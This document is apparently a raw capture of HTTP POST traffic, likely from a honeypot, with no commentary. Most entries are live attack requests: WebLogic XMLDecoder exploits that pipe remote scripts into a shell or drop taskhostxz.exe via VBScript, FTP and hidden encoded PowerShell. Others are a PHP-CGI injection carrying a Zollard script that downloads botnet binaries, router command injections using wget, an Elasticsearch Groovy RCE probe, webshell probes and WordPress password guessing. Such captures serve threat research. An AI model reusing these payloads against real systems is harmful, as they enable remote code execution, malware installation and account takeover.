<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1833
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://169.254.221.185:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://169.254.221.185:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://169.254.221.185:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://169.254.221.185:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://169.254.221.185:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://169.254.221.185:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://169.254.221.185:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://169.254.221.185:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>
POST http://check.proxyradar.com/azenv.php?auth=149303143827&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
SvYIlN/MZi+oWwdCeVnkHQJPYaxcCIdvHnsOl4G4AuoZjMbWiBiQbqBzvZrqmJbqj0AcJXvUvOBx9mqlQsbI7Bucn1KWgscPVjL944ZOS44sk9R2w8wpaHys4J9aWNVOFKu1kgNIbh52uDv9QHBAOhbd5lRcngbTvAyDI6P5cbArz8vy1I5/0vJZojxCMNiba4ngZ15AOfp5Lvv8R/SGQPnKulNZKKzDeGnMWBaQVfxpm+JczdQg4Qco+OlxXqrqoqjX9w6uWTcQfmKKpmVlrebFdmJ2i6JQQC/9mzBJ8Slci8S/cGDmerg/DkqQxk+5pC+TTVHBKyJiC13mdn6TEZB0O6hSx7hvaTDqp/T1b7qaOaa+4MgkbDo0IXyW5vS967ke1ixBMBcD6KWWDQ1coQ==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
S61ZwYzPYJJaXP77ODgBJn2D50eFbl8G8kYgnlCBYq+JRukrJ315AY3HApFzQzejUPX/U0cKHBC2ine4fnFCbo9A3/YxJDskmUMfrTwP9gxbZaaVuql6CQdLMwpb23N6cwqr+VwqGV++VH5Gr9QmuJVqwPpsFMHmTUsFJujFZrnChobJ6/w299I1mO53j1pl1g/cDUrOL7/RgDWTTm/H8nLitLzbKHYNx6RtUtNM5pecs087o3KImcikKp2Nxc83BFehgWquN+lhOvTAFjmGbxOC6NCsMgOSfNH1TVLgGcJ6DES2qsbczm05UGcefbiBkD+p7eQ/VsbLIcv9gX6Gz6eF4Zk5B+uOSaQPoJxt0SrNh1uI5LtawZjHiSDGM2lV0kPn8+Yy6Tc2KleBA1lUx6T88qax9HDBeg+t2p8HTeFQCUHqhk4=
POST http://check.proxyradar.com/azenv.php?auth=149394887959&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=admin&pwd=1717
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅΩÉû/Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î”˚Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
QaZalN6cNlMUlLnhHk5QGEOkdXaDN239s9xMKaDsMN2DMZvBlWu3X0Xbe4cZgdHYPR8dBkYd0SpsA7RE8ac1kiTuQ94N+phU0LnRaClptgK2RKbChwGX3P1BywpbBTC2fGWOZy3N8a6I+UAlSrnAu0wVg8YorBokfDrzY83ckoaNRpU22XXbX+5ItVLaL9WlKEvEFXhqcBPzHtbnhqDkBiQB48VwA3OTC3hJlmKScPp8D2Gg2VXpNu+Pmbeif2fAes+Td5GSB0HMot1lPvTH/80x5f70d/HwWYtVLNUG/VD87Mt7598WDlPURm9OdaKJEc3MxWe8wFynNBKfxWk8+rqk0VwA9bWJczygsu7AMtIbepPW5KB3Dqq00/W1wKD5rw9FLcOfVRwMgU+p500YA2CZfvAn/eAhRuHhs494vIs=
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=666666666
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
302317
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
5f5f82b8934a45ec485f14e777e35b58
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA--
POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259
{"vno":"1496039037390","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"3f5220ca","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496058185903
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2807
POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84
{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
RqQNwtyZYDB+H6iQxUMhQVNFR8ts2mEL1verFKUDDytmymhKDUqGsUmaaI32kVoHHUW7jGPmAHuaLldyaVcsybAV+NUJDgZagvFAknsc7laHGAWAJSAwpLbBNHSyAu8v76H8rVEj3GKzqARAbnYfxkboMqFR0k5gNCB8V7i+NmzokR64NwAphdLx13xnBNSy/USUSaBUEVS3cgr14ITj7z+JqqQSjMWCDqogbdRd9Fmi8QilizquhH/tHN6LkxoLTldAa/iAuGRpZFgRHh0zlrVv3DgxikTrVW2dNR3XZZidKV2LjDv7KZcp4RRlE9pSI6g5be0XnpM7ekC7pi5S4F1zGARtMwa8JcSdpNJSbIgR4Dz1J6HvHXApcJkRvnqWiA/WepR8TRwE0U9NZOY=
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=admin11
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1301
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 46.101.137.203&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=MKCT468MK
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
QPdZxozINzXsbCKeEWC1Yd1Au687rCAhemhSZrE6zhJmoODC2oJI5/TYNpVNcFPQbmZhcAJQmHube3KT3zUNi4Mc99uyhd2DsXdQKzch8I/V6zxjyodBWHRWG3UyrQgjY8SB+J1zIufFmYvkU5na8NBlVfw4e/sgCTt/XEssu0PuKojlcdQB9yXlLrux1ZeHeb6bAidtnvPzprVF/BpUR2a9IA1N39SABJ57G/BUzZ691veoqv37aUq+Abk79TQbasSCIE0WmcXKPL91I7UNYcpEXFrzDdY2t537GeKOA61J7p5MOHcKM6PHxRot2LSp0aQw3q81V9bJIu4awH5aSpjUeMCkUvzEXI6E/7rgyKo+QWLy
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172abc
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: gzip, deflate
Accept: */*
Content-Length: 103
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://149.28.96.126/80`&ipv=0
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=ashley
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://149.9.1.132:6668/ HTTP/1.0
Content-length: 24
Connection: close
ho:128.199.140.88:8080
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
